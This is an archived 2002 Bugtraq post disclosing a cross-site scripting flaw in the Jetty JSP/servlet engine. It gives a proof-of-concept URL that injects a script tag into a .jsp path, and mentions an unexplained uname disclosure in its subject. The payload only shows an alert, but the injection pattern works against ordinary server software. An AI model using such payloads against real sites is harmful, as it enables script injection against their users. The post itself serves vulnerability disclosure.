[27215] in bugtraq


Jetty jsp/servlet engine xss / uname disclosure vuln

daemon@ATHENA.MIT.EDU (skinnay@skinnux.com)
Sat Sep 28 15:36:02 2002

Message-ID: <2564.10.0.0.4.1033235597.squirrel@skinnux.com>
Date: Sat, 28 Sep 2002 13:53:17 -0400 (EDT)
From: <skinnay@skinnux.com>
To: <bugtraq@securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Jetty is an open source jsp/servlet engine thingamabob
http://jetty.mortbay.org

observe
http://jetty.mortbay.org/%0a%0a<script>alert("jax%20is%20ereet%20:P")</script>.jsp

found by skinnay@skinnux.com
www.skinnux.com
( site and email down a lot, not that anyone emails me anyway :)


